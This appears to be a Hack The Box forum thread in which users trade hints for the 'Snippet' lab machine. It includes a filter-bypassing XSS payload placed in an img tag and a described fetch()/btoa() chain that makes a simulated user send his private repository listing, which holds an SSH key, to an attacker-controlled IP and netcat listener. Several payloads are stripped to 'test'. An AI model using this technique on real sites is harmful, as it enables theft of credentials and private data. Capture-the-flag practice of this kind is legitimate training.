This is a payload which bypasses the filter:
eval.call`${"eval\x28atob`YWxlcnQoInRlc3QiKQ==`\x29"}`

Put that payload inside an img tag.

fetch() can be used here. Try fetch("http://10.10.xxx.xxx/") and you should see an incoming request from charlie.

Now let charlie request dev.snippet.htb/api/v1/users/charlie/repos and send the response back to you using fetch().then() + btoa().

In that repository is an SSH key. (Please don't post SSH keys/passwords.)

[quote="Exa" pid="164557" dateline="1658400336"]This is a payload which bypasses the filter:eval.call`${"eval\x28atob`YWxlcnQoInRlc3QiKQ==`\x29"}`Put that payload inside an img tag.fetch() can be used here. Try fetch("http://10.10.xxx.xxx/") and you should see an incoming request from charlie.Now let charlie request dev.snippet.htb/api/v1/users/charlie/repos and send the response back to you using fetch().then() + btoa().In that repository is an SSH key. (Please don't post SSH keys/passwords.)[/quote]In dev.snippet.htb, I registered a user, logged in, and add myself as a collaborator for jean/extension via API.Since, this extension is used in private repositories, I presume it is going to run in charlie's private repo.I create an issue and its body something like this: , and assigned it to Charlie.My netcat listener is not receiving anything.So I presume that Charlie is not checking issues or I am missing something here.Only after this point I will try to bypass filtering to fetch Charlie's repositories with your recommendation.

[quote="farkow" pid="164695" dateline="1658405749"]In dev.snippet.htb, I registered a user, logged in, and add myself as a collaborator for jean/extension via API.Since, this extension is used in private repositories, I presume it is going to run in charlie's private repo.I create an issue and its body something like this: , and assigned it to Charlie.My netcat listener is not receiving anything.So I presume that Charlie is not checking issues or I am missing something here.Only after this point I will try to bypass filtering to fetch Charlie's repositories with your recommendation.[/quote]Read inject.js. It will filter out the first as well as "src".

[quote="Exa" pid="164728" dateline="1658406930"][quote="farkow" pid="164695" dateline="1658405749"]In dev.snippet.htb, I registered a user, logged in, and add myself as a collaborator for jean/extension via API.Since, this extension is used in private repositories, I presume it is going to run in charlie's private repo.I create an issue and its body something like this: , and assigned it to Charlie.My netcat listener is not receiving anything.So I presume that Charlie is not checking issues or I am missing something here.Only after this point I will try to bypass filtering to fetch Charlie's repositories with your recommendation.[/quote]Read inject.js. It will filter out the first as well as "src".[/quote]Thank you! My original payload was like this: testAfter it still did not work, I reset the machine, and now I got a connection. Appreciated!

Any nudge for root? Ran linpeas and checked some of the clues but failed. And also tried tunneling and scanning, too.
(I am j**n)

Currently, checking out transfer.sh

[quote="farkow" pid="165423" dateline="1658430361"]Any nudge for root? Ran linpeas and checked some of the clues but failed. And also tried tunneling and scanning, too.[/quote]testI made the payload like this and it doesn't work? Can u fix it for me?

[quote="nhocit" pid="165434" dateline="1658430771"]testI made the payload like this and it doesn't work? Can u fix it for me?[/quote]Base64 decoded it's p://10.10.14.3I suggest you test your payloads in Firefox: F12 > Console

[quote="Exa" pid="165454" dateline="1658431583"][quote="nhocit" pid="165434" dateline="1658430771"]testI made the payload like this and it doesn't work? Can u fix it for me?[/quote]Base64 decoded it's p://10.10.14.3I suggest you test your payloads in Firefox: F12 > Console[/quote]Yeah, or VSCode. Use the same script, make a small html page for yourself and see how it is reflected in the inspector and console.

slightly stuck with this payloads.simple stuff works. I can get hit back:testbut I can't get hit back with any eval payloads. I tried several of them. Also tried to escape `` with \` \`[code]testtesttesttesttest[/code]This is getting really annoying.

[quote="onl1_f4ns" pid="165976" dateline="1658454789"]slightly stuck with this payloads.simple stuff works. I can get hit back:testbut I can't get hit back with any eval payloads. I tried several of them. Also tried to escape `` with \` \`[code]testtesttesttesttest[/code]This is getting really annoying.[/quote][code]Use this: testTest on your Firefox console! Create an HTML file with your payload, and then open the console to see whether it works correctly!Then just create new issue, even if the issue shows the code, it's ok; start the Netcat on your terminal, and you will see a hit back!